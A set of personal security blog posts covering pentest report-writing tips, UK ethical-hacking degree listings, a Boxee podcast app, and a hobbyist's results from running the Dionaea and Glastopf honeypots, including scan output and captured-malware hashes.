ethicalhack3r

Report writing has a bad reputation, every one seems to hate writing them and believe it to be the anticlimax of the assessment process. I haven’t been writing reports for very long, the reports that I have written I have enjoyed, no doubt in time the novelty will wear off and I will grow to hate them too. There are however lessons that I have learnt in my short report writing experience which I believe could have made my report writing that little bit easier and less time consuming. Those lessons I am going to share with you and if your just starting out in your report writing duties hopefully these can help you too. Or if your a report writing guru share your tips with me! The reports I have written are mainly web application assessments so I will concentrate on those.

During the testing phase of the assessment, document as much information as possible! There’s nothing worse than getting half way through your report and realising you forgot to document the affected vulnerable variable, you didn’t take a screenshot or you don’t know why you took the screenshot in the first place! This wastes a hell of a lot of time having to retrace your steps or having to revisit the vulnerability to gather more information. All this information should be documented and well organised. What I have done to help keep me keep organised is to create a spreadsheet template for the documentation of anything I find. Make sure you gather all the information necessary when you have found something and don’t move along until you have all the information you need for that particular finding.

Take screenshots of everything but remember what you took them for! Find a suitable screenshot application, most OSs come with their default screenshot applications however there are also others out there that may make your life easier. When taking the screenshots ensure that you don’t have any other tabs running or any other applications which are not related to the assessment it self. Save your screenshots in an adequate location and use an intelligent naming system. i.e. clientname-xss-1.png If possible time stamp every screenshot to keep a time log of your work.

OWASP

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software.

OWASP have tons of information on their website about all kinds of web application security topics. This information is very useful when writing reports to help you better explain the finding or to find the accepted term for the vulnerability you have found. OWASP also have some great books which can be bought in paper back form from lulu.com or downloaded for free in PDF format. If your not a member of OWASP become one now! (If you do use any direct quotes from OWASP reference them)

PAGE BREAKS! Use page breaks when writing your report, these help with the formatting and stop you having to keep reformatting the document as you add more information.

Be thorough! Explain as much as possible about the finding this will help the client in understanding the problem and hopefully save you some time at a later date in answering those questions. As well as being through and technical, explain your findings in laymen’s terms. You don’t know the technical expertise of the person who may be reading your report. In most cases managers and directors will read the report and they haven’t got a clue what a variable is or what Session Fixation is.

Proof read and re proof read. Your clients are paying good money for your professional expertise, they are expecting a professional report. Spell checkers don’t find all of the spelling errors! (Don’t forget to use the appropriate dictionary US/UK) Have some one within your company (who is authorised) to proof read the report for you. You’ve been looking at the report for the past 3 days, it’s always good to have a fresh pair of eyes have a look over it.

Keep a blank report template, this will save you time when writing future reports with not having to organise and format everything.

I’m sure there’s plenty of other things out there that I should be doing in my report writing to make my life easier, these I’m sure I will learn in time. If you have any tips/hints let me know!

Some resources and other helpful links:
Introduction_to_Security_Assessments.ppt
Security_Assessment_Template.doc
ORG (OWASP Report Generator)
The WASC Threat Classification v2.0
The Web Application Hackers Handbook – Checklist of tasks

One of the most popular posts on my blog is the Guest post: Current Available UK Degrees by 1337speak in April last year. I have decided to update the list as to keep the information up to date.

You who know me will know that I my self am enrolled on one of these University courses. I believe that if your starting out in security and want to make a career out of it this may be the best place to start. For me the course has done wonders, not only in what I have learnt however the people I’ve met and the drive it has given me to succeed in my chosen career.

BSc Security/Ethical Hacking Degrees in the UK:
Ethical Hacking for Computer Security – Northumbria University
Ethical Hacking and Network Security – Coventry University
Ethical Hacking & Countermeasures – University of Abertay
Computer Security & Ethical Hacking – Leeds Metropolitan University
Ethical Hacking and Security Systems Design – University of Sunderland
IT Security – University of Central Lancashire
Computer Security – De Montfort University
Computer Security – Staffordshire University
IT Security – University of Wolverhampton

More courses:
UCAS G550

I have surprised myself at how many courses are actually out there! Most of the courses have started in the past 3 years and will be starting in the next 2. It looks like there will be a lot more job competition in the next 5-10 years in the security industry. That’s OK, it will keep me on my toes. It seems information security in the UK is starting to become widespread and this can only be a good thing in the long run.

The listed courses above are for BSc university degrees, there are also MSc security courses and others out there which I have not listed.

What is Boxee?

Boxee is the best way to enjoy entertainment from the Internet and computer on your TV

http://www.boxee.tv/

Boxee allows you to develop ‘Apps’ which are basically XML files which grab RSS feeds. These Apps can be installed through remote repositorys. To truncate and combine all the security podcasts I used Yahoo! Pipes.

At the time of writting the SecurityPodcasts Boxee App includes PaulDotCom, Exotic Liability, TRACSec, EuroTrashSec, Security Justice and SecuraBit.

How to add the SecurityPodcasts App:

1. Run Boxee.
2. Click on ‘Apps’.
3. Click on ‘Repositorys’ under ‘Extras’.
4. Click ‘Add Repository’.
5. Enter my repository URL – http://www.ethicalhack3r.co.uk/repository
6. Click on ‘ethicalhack3r’.
7. Click on ‘SecurityPodcasts’.
8. Click on ‘Add to my Apps’.

SecurityPodcasts will now be in your Apps screen.

Currently SecurityPodcasts truncates the podcasts to the last 3 released. If you think this should be increased/decreased, let me know.

After running Glastopf (Glastopf – Web Application Honeypot) for a few days and not getting any hits, I was a bit disappointed. I speculate that maybe you need to give web application honeypots more time to propagate across the Internet and get picked up by search engines to receive any significant hits, or even give the honeypot its own domain name. From my earlier post you will notice that I had tried to get Dionaea to run first.

Markus the lead developer of Dionaea got in contact after he read my post and saw that I was having trouble getting it running. It turned out to be a complete fail on my part, after following the instructions on the Dionaea homepage, Dionaea installed perfectly fine, it was just a case of me not knowing how to run it properly.

What is Dionaea?

Dionaea is meant to be a nepenthes successor, embedding python as scripting language, using libemu to detect shellcodes, supporting ipv6 and tls

Dionaea intention is to trap malware exploiting vulnerabilities exposed by services offerd to a network, the ultimate goal is gaining a copy of the malware.

Dionaea offers the following services by default, SMB (main service offered), HTTP, FTP and TFTP.

Here is an Nmap scan of the honeypot (first 1000 ports):

PORT STATE SERVICE
21/tcp open ftp
|_ ftp-anon: Anonymous FTP login allowed
42/tcp open tcpwrapped
80/tcp open http?
|_ html-title: Directory listing for /
135/tcp open msrpc?
443/tcp open ssl/https?
|_ sslv2: server still supports SSLv2
|_ html-title: Directory listing for /
445/tcp open microsoft-ds?

Statistics:

Dionaea was running for 1 day, 11 hours and 44 minutes.
The first hit took 14 hours, 10 minutes and 16 seconds.
During that time there were 164 total remote hits.
Top 3 ports: 445, 135 and 0. (in order of hits)

RPC Vulnerabilities exploited:
MS03-26
MS04-11
MS04-12
MS05-017
MS07-065
MS06-66
MS05-39
MS08-67
MS04-11

Captured Malware:
14a09a48ad23fe0ea5a180bee8cb750a
31ab688b36e7d8e5ce1082faa95f730e
53fed7473c878ad4b4e57a42c99df38f
69101c9cbc14f5778efa795bbd25e02c
833cda5b5bef5989deb6bf57c557ce30
93094c5ea5a47e5c5f3e020f2c434c35
df51e3310ef609e908a6b487a28ac068
f2d8d3ef1d5623bdfa9a0eebd4fc2266
f8815cdca238ad5ab566f05f5a6335a4

You can search for the malware associated with the MD5 hashes above here: http://www.virustotal.com/buscaHash.html

Dionaea is excellent, I feel that I have only scratched the surface of its true potential. For now unfortunately, the honeypot is turned off until I find a more suitable place to store it other than my living room floor. Hopefully I will do more work in the area of honeypots in the near future once I have some more spare time.

I bought an old battered PC over the weekend with the goal of installing a honeypot. I had never installed a honeypot before so wasn’t quite sure what to expect. At first I decided on Dionaea the succsesor to Nepenthes, I had heard great things about Nepenthes from a friend of mine (Infosanity). After going through the installation process, I couldn’t get Dionaea to ‘make’ with the right Python version detected (> 3.0), after about an hour of playing around I decided to give Glastopf a try.

Glastopf is a Honeypot which emulates thousands vulnerabilities to gather data from attacks targeting web applications. The principle behind it is very simple: Reply the correct response to the attacker exploiting the web application. The project has been kicked off by Lukas Rist around one year ago and the results we are got during this time are very promising and an incentive to put even more effort in the development of this unique tool.

Glastopf was very easy to install and configure, I simply downloaded the subversion trunk and ran it with “sudo python webserver.py”. Glastopf was up and running however not configured. Glastopf gives you the option to save the honeypot logs to a MySQL database, for this all you have to do is install MySQL and python-mysql, set up the database/tables and add the ‘mysql.py’ plugin to the configuration file. Glastopf provides you with the table structure already set out in the ‘/structure/log.sql’ file, to import the file I used ‘mysql-navigator’ (sudo apt-get install mysql-navigator), mysql-navigator is a GUI client for MySQL, you can however just use the MySQL command line client.

All I had to do now was forward port 80 on my router to the machine with Glastopf running on it. I will now leave the machine running for a few days and hopefully come back with some statistics, which I will of course be posting and making pretty little graphs out of. :) If the initial statistics and hits are positive I will try to keep the honeypot running indefinitely and some how link the stats to the blog.